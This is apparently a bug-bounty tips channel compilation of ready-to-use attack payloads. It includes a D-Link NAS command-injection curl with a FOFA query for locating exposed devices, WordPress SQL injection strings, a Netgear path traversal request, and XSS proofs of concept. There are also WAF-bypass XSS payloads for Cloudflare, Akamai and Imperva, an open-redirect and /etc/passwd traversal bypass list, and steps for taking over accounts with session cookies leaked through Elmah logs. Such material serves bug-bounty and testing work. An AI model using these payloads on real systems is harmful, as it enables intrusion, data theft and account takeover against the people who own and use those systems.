Bug bounty Tips

CVE-2024-10914 (CVSS 9.2): Command Injection Flaw Threatens 61,000+ D-Link NAS Devices The vulnerability is localized to the account_mgr.cgi script, particularly in the handling of the cgi_user_add command. The name parameter in this script does not adequately sanitize input, allowing for command execution. Exploit:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

Affected Devices:

DNS-320 – Version 1.00 DNS-320LW – Version 1.01.0914.2012 DNS-325 – Versions 1.01 and 1.02 DNS-340L – Version 1.08

Search query:

FOFA: app="D_Link-DNS-ShareCenter"

𝗔𝗽𝗽𝗹𝘆𝗶𝗻𝗴 𝗟𝗟𝗠'𝘀 & 𝗚𝗲𝗻 𝗔𝗜 𝘁𝗼 𝗖𝘆𝗯𝗲𝗿𝘀𝗲𝗰𝘂𝗿𝗶𝘁𝘆 🍁 List of resources for everything you need to know about how to build and apply LLMs even if you don't have a background in data science, software engineering, machine learning, AI, but want to join the GenAI wave Link 🔗:- https://start.me/p/9oJvxx/applying-llms-genai-to-cyber-security

Breaking Down Multipart Parsers: File upload validation bypass https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/

Check for Subdomain Takeover Vulnerabilities This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.

subfinder -d target.com -silent | while read sub; do host $sub; done | grep "NXDOMAIN"

Replace nasa.gov with your target.

Dorks and JS Files by zseano https://www.youtube.com/watch?v=0jM8dDVifaI

Learn javascript that helps you to read js files, Most important thing to do. I Found a medium article on it that explain everything, MUST READ. Part 1: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-1-dd08ed34b5a8 Part 2: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-2-f82164917e7 Part 3: https://bitthebyte.medium.com/javascript-for-bug-bounty-hunters-part-3-3b987f24ab27

Reduce Noise in Burp Suite with This Simple Trick! 🔥 💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:

.*\.google\.com

.*\.gstatic\.com

.*\.googleapis\.com

.*\.pki\.goog

.*\.mozilla\..*

If you have any other filters to do share, drop it on comments!

https://github.com/ferreiraklet/jeeves Time Based Blind Injection Scanner

🕷Robofinder I've developed a Python script that allows you to search for and retrieve historical robots.txt files for any given website using Archive.org. This tool is particularly useful for security researchers and web archivists to discover previously accessible paths or directories that were once listed in a site's robots.txt. 1. Clone the repository and install the required dependencies: git clone https://github.com/Spix0r/robofinder.git cd robofinder pip install -r requirements.txt 2. Run the program by providing a URL with the -u flag: python3 robofinder.py -u https://example.com 👀 Discover additional commands and options on GitHub page (don’t forget to give it a star ⭐️)👇 📱Github: 🔗Link #CyberSecurity #bugbountyTools #bugbounty #Recon #reconnaissance #infosec #Archive #bugbountytips 🔸🔸🔸🔸🔸🔸🔸🔸 ⚡ Boost The Channel 🕷 https://t.me/bugbounty_tech 🔸🔸🔸🔸🔸🔸🔸🔸

🕵️ How to Leverage Elmah Disclosures for Account Takeover: 1️⃣ Locate the Elmah File: Found an Elmah file on your target? Open it by navigating to /elmah or /elmah.axd. 2️⃣ View Error Logs: Click "Details" on any log entry to reveal the full HTTP request, including headers. 3️⃣ Look for Session Cookies: The details may expose session cookies or internal routes tied to authenticated users. 4️⃣ Attempt Account Access: Use the disclosed session cookies on a request to the target, e.g., http://example[.]com. In many cases, this results in access to an internal employee or administrative accounts!

CVE ID : CVE-2024-5522 System : wordpress Type : sql injectiton Exploit :

HTML5 Video Player WordPress plugin before 2.5.27

GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -

Anther PoC

% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-" {"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.02s system 0% cpu 5.760 total

CVE ID : CVE-2024-6646 System : Netgear WN604 Type : Path Traversal Exploit :

GET /downloadFile.php?file=config HTTP/1.1

CVE ID : CVE-2015-7377 System : wordpress Type : Reflected XSS Exploit :

Effects

Pie Register WordPress Plugin 2.0.18

XSS with base64 encode

http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

For copy the PoC 🔻

SQLI Injection CVE: 2024-36837 Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 #BugBounty  #Tips

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

Cloudflare #XSS WAF Bypass by @nav1n0x Payload:

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 

#cybersec #bugbountytips #infosec

Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips